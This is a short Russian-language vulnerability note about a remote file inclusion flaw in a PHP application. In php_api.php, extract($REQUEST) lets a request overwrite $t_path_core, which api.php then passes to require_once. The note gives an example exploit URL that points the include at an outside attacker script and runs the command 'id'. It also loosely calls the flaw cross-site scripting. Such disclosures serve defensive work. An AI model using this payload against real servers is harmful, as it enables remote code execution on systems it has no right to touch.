Описание:
Уязвимость в скрипте php_api.php в 77 строке:
extract($REQUEST);
Это позволяет изменить переменную $t_path_core которая используется в скрипте api.php:
require_once( $t_path_core . 'constants_inc.php' );
Это может быть использовано для межсайтового скриптинга (так называемый внешний инклуд), и выполнениии произвольных комманд:
Пример:
http://server/xxxxx/api.php?t_path_core=http://pathtohackingscript&cmd=id
